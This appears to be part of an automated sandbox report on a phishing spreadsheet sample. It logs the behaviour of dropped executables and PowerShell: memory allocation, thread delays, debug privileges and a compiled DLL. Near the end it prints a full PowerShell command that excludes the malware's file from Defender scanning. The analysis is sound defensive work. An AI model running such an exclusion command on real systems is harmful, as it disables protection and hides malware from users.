                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxStream path 'Workbook' entropy: 7.99883444676 (max. 8.0)
                        Source: 44330000.0.drStream path 'Workbook' entropy: 7.99876854211 (max. 8.0)
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 8C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 5400000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 6400000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 7C80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: AC80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 350000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 2690000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: 5D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 2890000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 5E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 5540000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 52B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 6760000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 7760000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 7B50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 8B50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 9B50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: AB50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 1D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 2890000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMemory allocated: 1D0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89432C63 sldt ax7_2_000007FE89432C63
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\sihost.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeThread delayed: delay time: 600000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2883Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7080Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2216Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2858Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeWindow / User API: threadDelayed 1577
                        Source: C:\Users\user\AppData\Roaming\sihost.exeWindow / User API: threadDelayed 8168
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2047
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2371
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeWindow / User API: threadDelayed 9821
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.dllJump to dropped file
                        Source: C:\Windows\System32\mshta.exe TID: 3064Thread sleep time: -420000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 2883 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 7080 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3552Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3728Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3832Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3832Thread sleep time: -1200000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3844Thread sleep count: 1577 > 30
                        Source: C:\Users\user\AppData\Roaming\sihost.exe TID: 3844Thread sleep count: 8168 > 30
                        Source: C:\Windows\System32\taskeng.exe TID: 3684Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exe TID: 3860Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exe TID: 3744Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exe TID: 3480Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exe TID: 428Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exe TID: 428Thread sleep time: -2400000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exe TID: 3584Thread sleep count: 9821 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\sihost.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeThread delayed: delay time: 600000
                        Source: sihost.exe, 0000000C.00000002.460456249.0000000004086000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FvMci
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_0036A020 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,17_2_0036A020
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\sihost.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"Jump to behavior
